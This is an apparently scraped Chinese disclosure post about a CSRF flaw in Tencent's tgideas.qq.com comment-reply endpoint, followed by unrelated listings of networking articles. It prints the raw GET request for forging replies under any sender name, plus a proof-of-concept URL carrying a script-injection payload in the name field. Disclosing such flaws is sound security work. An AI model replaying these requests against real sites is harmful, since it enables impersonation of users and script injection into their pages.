腾讯游戏设计(tgideas.qq.com)回复处CSRF任意换马甲

简介: http://tgideas.qq.com GET /cgi-bin/comments/sendreply.cgi?iActivId=1&iSubActivId=215722&iParentId=2156&sSenderName=y0umer&iSenderZone=0&sContent=csrftest HTTP/1.

http://tgideas.qq.com

wps_clip_image-5431

GET /cgi-bin/comments/sendreply.cgi?iActivId=1&iSubActivId=215722&iParentId=2156&sSenderName=y0umer&iSenderZone=0&sContent=csrftest HTTP/1.1

Host: apps.game.qq.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0

Accept: */*

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://tgideas.qq.com/webplat/info/news_version3/804/808/810/m579/201307/215722.shtml

Cookie:

Connection: keep-alive

iActivId

1

iParentId

2156

iSenderZone

0

iSubActivId

215722

sContent

csrftest

sSenderName

y0umer

wps_clip_image-14955

一个牛逼的get,即可导致回复评论。。

wps_clip_image-14707

wps_clip_image-31522

好像还能随意换马甲:

wps_clip_image-6576

Poc:

http://apps.game.qq.com/cgi-bin/comments/sendreply.cgi?iActivId=1&iSubActivId=215722&iParentId=2156&sSenderName=%3Cscript%3Ealert%281%29%3C/script%3E&iSenderZone=0&sContent=csrftest

回复get? 好歹也验证下来源吧..

目录
相关文章
|
7月前
|
网络协议 网络架构
你以为键入网址后只是等待吗?惊!原来网页显示背后隐藏着这些奇妙步骤(上)
当我们键入一个网址后,从键入网址到网页显示之间会发生许多复杂的步骤。这篇文章旨在详细解释这一过程,帮助读者深入了解HTTP、DNS和协议栈等相关知识。通过这篇文章,读者可以消除疑惑,也可巩固对网络通信的理解,从而更好地应用和利用互联网。
105 6
你以为键入网址后只是等待吗?惊!原来网页显示背后隐藏着这些奇妙步骤(上)
|
7月前
|
域名解析 缓存 网络协议
你以为键入网址后只是等待吗?惊!原来网页显示背后隐藏着这些奇妙步骤(中)
通过对TCP/IP协议的深入研究,我们可以更好地理解网络通信的整个过程,以及各个协议在其中的作用。这对于我们理解和解决网络通信中的问题非常重要。希望通过本文的学习,能够对TCP/IP协议有更深入的了解,并能够应用到实际的网络通信中。
你以为键入网址后只是等待吗?惊!原来网页显示背后隐藏着这些奇妙步骤(中)
|
7月前
|
缓存 网络协议 安全
你以为键入网址后只是等待吗?惊!原来网页显示背后隐藏着这些奇妙步骤(终章)
这篇文章简要介绍了计算机网络中交换机和路由器的工作原理,以及它们在网络通信和连接中的重要作用。交换机利用MAC地址表实现数据包的转发,而路由器则根据IP地址进行转发决策,将数据包从一个网络转发到另一个网络。通过交换机和路由器的协同工作,网络实现了高效的数据传输和通信。
|
Android开发
【Android应用篇】防止连续点击,跳转两页
有时候在小说界面,你想点下一页,然后还没翻过去正翻一半,你又点了一次,结果就翻2页。
104 0
|
算法 Java PHP
半天不到,实现仿微博URL短地址算法与解析
半天不到,实现仿微博URL短地址算法与解析
|
缓存 网络协议 前端开发
听过N次还是不会之:浏览器输入url后到底经历了什么
听过N次还是不会之:浏览器输入url后到底经历了什么
听过N次还是不会之:浏览器输入url后到底经历了什么
|
分布式计算 大数据 Hadoop
【合集】想要轻松玩转阿里云?这里干货请收下!
在这里你可以寻找你想要的所有干货,带你一图了解阿里云!
292 0
【合集】想要轻松玩转阿里云?这里干货请收下!
|
存储 Web App开发 缓存
网红面试题:从输入 url 到看到页面发生了什么
从输入 url 到看到页面发生了什么
203 0
网红面试题:从输入 url 到看到页面发生了什么
|
域名解析 负载均衡 网络协议
麻烦你说下输入百度网址过后整个过程是什么样子的?
Hello 大家好,我是阿粉。虽然说金三银四已经过去,但是金九银十快要来了,作为一个居安思危的阿粉,无时无刻不在准备着学习和面试,今天这个题目相信很多面试过的小伙伴都被问到过,问题其实不难,只是如果有的小伙伴没有遇到过,可能不会思考到具体的细节,或者说很多东西可能都知道但是并不知道面试官问这个问题的点在哪,所以会有所欠考虑抓不到重点。下面我们就依次来看一下整个过程到底发生了什么。